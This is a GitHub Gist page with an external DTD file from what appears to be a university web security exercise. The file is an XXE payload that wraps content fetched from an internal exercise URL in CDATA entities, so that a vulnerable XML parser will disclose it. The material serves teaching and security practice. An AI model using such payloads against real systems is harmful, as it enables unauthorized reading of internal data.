Skip to content

Instantly share code, notes, and snippets.

@dev-it-yannik
dev-it-yannik / ext.dtd
Last active June 19, 2025 15:51
Web Security Exercise 8 2c)
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "https://internal.websec.cs.uni-paderborn.de/second">
<!ENTITY % end "]]>">
<!ENTITY all "%start;%file;%end;">